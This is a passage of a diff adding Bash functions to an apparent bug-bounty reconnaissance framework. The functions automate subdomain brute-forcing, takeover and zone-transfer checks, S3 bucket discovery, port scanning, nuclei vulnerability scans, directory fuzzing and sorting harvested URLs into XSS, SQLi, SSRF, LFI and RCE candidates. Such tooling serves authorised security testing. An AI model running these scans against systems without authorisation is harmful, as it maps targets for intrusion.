+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBPERMUTE" = true ]
+ then
+ start_subfunc "Running : Permutations Subdomain Enumeration"
+ if [ "$DEEP" = true ] ; then
+ eval axiom-scan subdomains/subdomains.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt
+ eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute1_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt
+ eval axiom-scan .tmp/permute1.txt -m dnscewl -o .tmp/DNScewl2_.txt $DEBUG_STD && cat .tmp/DNScewl2_.txt | grep ".$domain$" > .tmp/DNScewl2.txt
+ eval axiom-scan .tmp/DNScewl2.txt -m puredns-resolve -o .tmp/permute2_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt
+ eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt
+ else
+ if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]]
+ then
+ eval axiom-scan .tmp/subs_no_resolved.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt
+ eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute1_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt
+ eval axiom-scan .tmp/permute1.txt -m dnscewl -o .tmp/DNScewl2_.txt $DEBUG_STD && cat .tmp/DNScewl2_.txt | grep ".$domain$" > .tmp/DNScewl2.txt
+ eval axiom-scan .tmp/DNScewl2.txt -m puredns-resolve -o .tmp/permute2_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt
+ eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt
+ elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 200 ]]
+ then
+ eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt
+ eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD
+ eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt
+ else
+ if [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]]
+ then
+ eval axiom-scan subdomains/subdomains.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt
+ eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute1_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt
+ eval axiom-scan .tmp/permute1.txt -m dnscewl -o .tmp/DNScewl2_.txt $DEBUG_STD && cat .tmp/DNScewl2_.txt | grep ".$domain$" > .tmp/DNScewl2.txt
+ eval axiom-scan .tmp/DNScewl2.txt -m puredns-resolve -o .tmp/permute2_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt
+ eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt
+ elif [[ $(cat subdomains/subdomains.txt | wc -l) -le 200 ]]
+ then
+ eval axiom-scan subdomains/subdomains.txt -m dnscewl -o .tmp/DNScewl1_.txt $DEBUG_STD && cat .tmp/DNScewl1_.txt | grep ".$domain$" > .tmp/DNScewl1.txt
+ eval axiom-scan .tmp/DNScewl1.txt -m puredns-resolve -o .tmp/permute_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt
+ else
+ printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n"
+ fi
+ fi
+ fi
+ if [ -f ".tmp/permute_subs.txt" ]
+ then
+ deleteOutScoped $outOfScope_file .tmp/permute_subs.txt
+ NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" |anew subdomains/subdomains.txt | wc -l)
+ else
+ NUMOFLINES=0
+ fi
+ end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]}
+ else
+ if [ "$SUBPERMUTE" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function sub_recursive(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBRECURSIVE" = true ]
+ then
+ if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]]
+ then
+ start_subfunc "Running : Subdomains recursive search"
+ echo "" > .tmp/brute_recursive_wordlist.txt
+ for sub in $(cat subdomains/subdomains.txt); do
+ sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt
+ done
+ eval axiom-scan .tmp/brute_recursive_wordlist.txt -m puredns-resolve -o .tmp/brute_recursive_result.txt $DEBUG_STD
+ cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt
+ eval axiom-scan .tmp/brute_recursive.txt -m dnscewl -o .tmp/DNScewl1_recursive_.txt $DEBUG_STD && cat .tmp/DNScewl1_recursive_.txt | grep ".$domain$" > .tmp/DNScewl1_recursive.txt
+ eval axiom-scan .tmp/DNScewl1_recursive.txt -m puredns-resolve -o .tmp/permute1_recursive_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt
+ eval axiom-scan .tmp/permute1_recursive.txt -m dnscewl -o .tmp/DNScewl2_recursive_.txt $DEBUG_STD && cat .tmp/DNScewl2_recursive_.txt | grep ".$domain$" > .tmp/DNScewl2_recursive.txt
+ eval axiom-scan .tmp/DNScewl2_recursive.txt -m puredns-resolve -o .tmp/permute2_recursive_tmp.txt $DEBUG_STD
+ eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt
+
+ NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l)
+
+ end_subfunc "${NUMOFLINES} new subs (recursive)" ${FUNCNAME[0]}
+ else
+ notification "Skipping Recursive: Too Much Subdomains" warn
+ fi
+ else
+ if [ "$SUBRECURSIVE" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function subtakeover(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBTAKEOVER" = true ]
+ then
+ start_func "Looking for possible subdomain takeover"
+ touch .tmp/tko.txt
+ eval axiom-scan webs/webs.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/takeovers/ -o .tmp/tko.txt $DEBUG_STD
+ NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l)
+ if [ "$NUMOFLINES" -gt 0 ]; then
+ notification "${NUMOFLINES} new possible takeovers found" info
+ fi
+ end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]}
+ else
+ if [ "$SUBTAKEOVER" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function zonetransfer(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$ZONETRANSFER" = true ]
+ then
+ start_func "Zone transfer check"
+ eval python3 $tools/dnsrecon/dnsrecon.py -d $domain -a -j subdomains/zonetransfer.json $DEBUG_STD
+ if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi
+ end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]}
+ else
+ if [ "$ZONETRANSFER" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function s3buckets(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$S3BUCKETS" = true ]
+ then
+ start_func "AWS S3 buckets search"
+ eval axiom-scan subdomains/subdomains.txt -m s3scanner -o .tmp/s3buckets.txt $DEBUG_STD
+ NUMOFLINES=$(eval cat .tmp/s3buckets.txt $DEBUG_ERROR | anew subdomains/s3buckets.txt | wc -l)
+ if [ "$NUMOFLINES" -gt 0 ]; then
+ notification "${NUMOFLINES} new S3 buckets found" info
+ fi
+ end_func "Results are saved in subdomains/s3buckets.txt" ${FUNCNAME[0]}
+ else
+ if [ "$S3BUCKETS" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+###############################################################################################################
+########################################### WEB DETECTION #####################################################
+###############################################################################################################
+
+function webprobe_simple(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBESIMPLE" = true ]
+ then
+ start_subfunc "Running : Http probing"
+
+ if [ -s ".tmp/probed_tmp_scrap.txt" ]
+ then
+ mv .tmp/probed_tmp_scrap.txt .tmp/probed_tmp.txt
+ else
+ eval axiom-scan subdomains/subdomains.txt -m httpx -follow-host-redirects -random-agent -threads $HTTPX_THREADS -status-code -timeout 15 -silent -retries 2 -no-color -o .tmp/probed_tmp_.txt $DEBUG_STD && cat .tmp/probed_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt
+ fi
+ deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt
+ NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l)
+ end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]}
+ else
+ if [ "$WEBPROBESIMPLE" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function webprobe_full(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ]
+ then
+ start_func "Http probing non standard ports"
+ eval axiom-scan subdomains/subdomains.txt -m httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -follow-host-redirects -random-agent -status-code -timeout 10 -threads $HTTPX_UNCOMMONPORTS_THREADS -silent -retries 2 -no-color -o .tmp/probed_uncommon_ports_tmp_.txt $DEBUG_STD && cat .tmp/probed_uncommon_ports_tmp_.txt | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_uncommon_ports_tmp.txt
+ NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l)
+ notification "Uncommon web ports: ${NUMOFLINES} new websites" good
+ eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR
+ end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]}
+ else
+ if [ "$WEBPROBEFULL" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function screenshot(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBSCREENSHOT" = true ]
+ then
+ start_func "Web Screenshots"
+ eval axiom-scan webs/webs.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD
+ eval axiom-scan webs/webs_uncommon_ports.txt -m gowitness --disable-logging -o screenshots $DEBUG_STD
+ end_func "Results are saved in screenshots folder" ${FUNCNAME[0]}
+ else
+ if [ "$WEBSCREENSHOT" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+###############################################################################################################
+############################################# HOST SCAN #######################################################
+###############################################################################################################
+
+function favicon(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FAVICON" = true ]
+ then
+ start_func "Favicon Ip Lookup"
+ cd $tools/fav-up
+ eval python3 favUp.py -w $domain -sc -o favicontest.json $DEBUG_STD
+ if [ -f "favicontest.json" ]
+ then
+ cat favicontest.json | eval jq -r '.found_ips' $DEBUG_ERROR | grep -v "not-found" > favicontest.txt
+ sed -i "s/|/\n/g" favicontest.txt
+ eval cat favicontest.txt $DEBUG_ERROR
+ eval mv favicontest.txt $dir/hosts/favicontest.txt $DEBUG_ERROR
+ eval rm favicontest.json $DEBUG_ERROR
+ fi
+ cd $dir
+ end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]}
+ else
+ if [ "$FAVICON" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+function portscan(){
+ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PORTSCANNER" = true ]
+ then
+ start_func "Port scan"
+ for sub in $(cat subdomains/subdomains.txt); do
+ echo "$sub $(dig +short a $sub | tail -n1)" | anew -q .tmp/subs_ips.txt
+ done
+ awk '{ print $2 " " $1}' .tmp/subs_ips.txt | sort -k2 -n | anew -q hosts/subs_ips_vhosts.txt
+ eval cat hosts/subs_ips_vhosts.txt $DEBUG_ERROR | cut -d ' ' -f1 | egrep -iv "^(127|10|169|172|192)\." | anew -q hosts/ips.txt
+ eval axiom-scan webs/webs.txt -m cf-check -o .tmp/ips_nowaf_.txt $DEBUG_STD && cat .tmp/ips_nowaf_.txt | egrep -iv "^(127|10|169|172|192)\." | anew -q .tmp/ips_nowaf.txt
+ printf "${bblue}\n Resolved IP addresses (No WAF) ${reset}\n\n";
+ eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort
+
+ printf "${bblue}\n Scanning ports... ${reset}\n\n";
+ if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "hosts/portscan_passive.txt" ]
+ then
+ for sub in $(cat hosts/ips.txt); do
+ shodan host $sub 2>/dev/null >> hosts/portscan_passive.txt && echo -e "\n\n#######################################################################\n\n" >> hosts/portscan_passive.txt
+ done
+ fi
+
+ if [ "$PORTSCAN_ACTIVE" = true ]
+ then
+ eval axiom-scan .tmp/ips_nowaf.txt -m nmap --top-ports 1000 -sV -n --max-retries 2 -oN hosts/portscan_active.txt -oG .tmp/nmap_grep.gnmap $DEBUG_STD
+ fi
+
+ end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]}
+ else
+ if [ "$PORTSCANNER" = false ]; then
+ printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
+ fi
+}
+
+###############################################################################################################
+############################################# WEB SCAN ########################################################
+###############################################################################################################
+
+function waf_checks(){
+ if ([ !
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WAF_DETECTION" = true ] + then + start_func "Website's WAF detection" + eval axiom-scan webs/webs.txt -m wafw00f -o .tmp/wafs.txt $DEBUG_STD + cat .tmp/wafs.txt | sed -e 's/^[ \t]*//' -e 's/ \+ /\t/g' -e '/(None)/d' | tr -s "\t" ";" > webs/webs_wafs.txt + NUMOFLINES=$(eval cat webs/webs_wafs.txt $DEBUG_ERROR | wc -l) + notification "${NUMOFLINES} websites protected by waf" info + end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} + else + if [ "$WAF" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function nuclei_check(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$NUCLEICHECK" = true ] + then + start_func "Templates based web scanner" + eval nuclei -update-templates $DEBUG_STD + mkdir -p nuclei_output + printf "${yellow}\n Running : Nuclei Info${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity info -r $resolvers_trusted -o nuclei_output/info.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei Low${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity low -r $resolvers_trusted -o nuclei_output/low.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei Medium${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity medium -r $resolvers_trusted -o nuclei_output/medium.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei High${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity high -r $resolvers_trusted -o nuclei_output/high.txt $DEBUG_STD + printf "${yellow}\n\n Running : Nuclei Critical${reset}\n\n" + eval axiom-scan webs/webs.txt -m nuclei -severity critical -r $resolvers_trusted -o nuclei_output/critical.txt $DEBUG_STD + printf "\n\n" + end_func "Results are saved in 
nuclei_output folder" ${FUNCNAME[0]} + else + if [ "$NUCLEICHECK" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function fuzz(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$FUZZ" = true ] + then + start_func "Web directory fuzzing" + mkdir -p $dir/fuzzing + for sub in $(cat webs/webs.txt); do + printf "${yellow}\n\n Running: Fuzzing in ${sub}${reset}\n" + sub_out=$(echo $sub | sed -e 's|^[^/]*//||' -e 's|/.*$||') + ffuf -mc all -fc 404 -ac -t $FFUF_THREADS -sf -s -H "${HEADER}" -w $fuzz_wordlist -maxtime 900 -u $sub/FUZZ -or -o $dir/fuzzing/${sub_out}.tmp &>/dev/null + eval cat $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR | jq '[.results[]|{status: .status, length: .length, url: .url}]' | grep -oP "status\":\s(\d{3})|length\":\s(\d{1,7})|url\":\s\"(http[s]?:\/\/.*?)\"" | paste -d' ' - - - | awk '{print $2" "$4" "$6}' | sed 's/\"//g' | sort |anew -q $dir/fuzzing/${sub_out}.txt + eval rm $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR + done + end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} + else + if [ "$FUZZ" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function cms_scanner(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CMS_SCANNER" = true ] + then + start_func "CMS Scanner" + mkdir -p $dir/cms && rm -rf $dir/cms/* + tr '\n' ',' < webs/webs.txt > .tmp/cms.txt + eval python3 $tools/CMSeeK/cmseek.py -l .tmp/cms.txt --batch -r $DEBUG_STD + for sub in $(cat webs/webs.txt); do + sub_out=$(echo $sub | sed -e 's|^[^/]*//||' -e 's|/.*$||') + cms_id=$(eval cat $tools/CMSeeK/Result/${sub_out}/cms.json $DEBUG_ERROR | jq -r '.cms_id') + if [ -z "$cms_id" ] + then + rm -rf $tools/CMSeeK/Result/${sub_out} + else + mv -f $tools/CMSeeK/Result/${sub_out} $dir/cms/ + fi + done + end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]} + else + if [ "$CMS_SCANNER" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function params(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$PARAMS" = true ] + then + start_func "Parameter Discovery" + printf "${yellow}\n\n Running : Searching params with paramspider${reset}\n" + cat webs/webs.txt | sed -r "s/https?:\/\///" | anew -q .tmp/probed_nohttp.txt + eval axiom-scan .tmp/probed_nohttp.txt -m paramspider -l high -q --exclude eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt,js -o output_paramspider $DEBUG_STD + eval cat output_paramspider/*.txt $DEBUG_ERROR | anew -q .tmp/param_tmp.txt + sed '/^FUZZ/d' -i .tmp/param_tmp.txt + eval rm -rf output_paramspider/ $DEBUG_ERROR + if [ "$DEEP" = true ] ; then + printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" + eval axiom-scan .tmp/param_tmp.txt -m arjun -t $ARJUN_THREADS -o webs/param.txt $DEBUG_STD + else + if [[ $(cat .tmp/param_tmp.txt | wc -l) -le 50 ]] + then + printf "${yellow}\n\n Running : Checking ${domain} with Arjun${reset}\n" + eval axiom-scan .tmp/param_tmp.txt -m arjun -t $ARJUN_THREADS -o webs/param.txt $DEBUG_STD + else + cp .tmp/param_tmp.txt webs/param.txt + fi + fi + end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} + else + if [ "$PARAMS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function urlchecks(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_CHECK" = true ] + then + start_func "URL Extraction" + mkdir -p js + + eval axiom-scan webs/webs.txt -m waybackurls -o .tmp/url_extract_way_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_way_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + eval axiom-scan webs/webs.txt -m gau -o .tmp/url_extract_gau_tmp.txt $DEBUG_STD && eval cat .tmp/url_extract_gau_tmp.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + + diff_webs=$(diff <(sort -u .tmp/probed_tmp.txt) <(sort -u webs/webs.txt) | wc -l) + if [ $diff_webs != "0" ] || [ ! -s ".tmp/gospider.txt" ] ; + then + if [ "$DEEP" = true ] ; then + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + else + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 2 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + fi + cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt + fi + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt + if [ -s "${GITHUB_TOKENS}" ] + then + eval github-endpoints -q -k -d $domain -t ${GITHUB_TOKENS} -o .tmp/github-endpoints.txt $DEBUG_STD + eval cat .tmp/github-endpoints.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + fi + eval cat .tmp/url_extract_tmp.txt webs/param.txt $DEBUG_ERROR | grep "${domain}" | grep "=" | eval qsreplace -a $DEBUG_ERROR | egrep -iv "\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|pdf|svg|txt|js)$" | anew -q .tmp/url_extract_tmp2.txt + cat .tmp/url_extract_tmp.txt | grep "${domain}" | egrep -i "\.(js)" | anew -q js/url_extract_js.txt + eval uddup -u .tmp/url_extract_tmp2.txt -o .tmp/url_extract_uddup.txt $DEBUG_STD + NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) + notification "${NUMOFLINES} new urls with params" info + end_func "Results are saved in 
webs/url_extract.txt" ${FUNCNAME[0]} + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi +} + +function url_gf(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_GF" = true ] + then + start_func "Vulnerable Pattern Search" + mkdir -p gf + gf xss webs/url_extract.txt | anew -q gf/xss.txt + gf ssti webs/url_extract.txt | anew -q gf/ssti.txt + gf ssrf webs/url_extract.txt | anew -q gf/ssrf.txt + gf sqli webs/url_extract.txt | anew -q gf/sqli.txt + gf redirect webs/url_extract.txt | anew -q gf/redirect.txt && cat gf/ssrf.txt | anew -q gf/redirect.txt + gf rce webs/url_extract.txt | anew -q gf/rce.txt + gf potential webs/url_extract.txt | cut -d ':' -f3-5 |anew -q gf/potential.txt + cat .tmp/url_extract_tmp.txt | egrep -iv "\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|pdf|svg|txt|js)$" | unfurl -u format %s://%d%p | anew -q gf/endpoints.txt + gf lfi webs/url_extract.txt | anew -q gf/lfi.txt + end_func "Results are saved in gf folder" ${FUNCNAME[0]} + else + if [ "$URL_GF" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function url_ext(){ + if ([ ! 
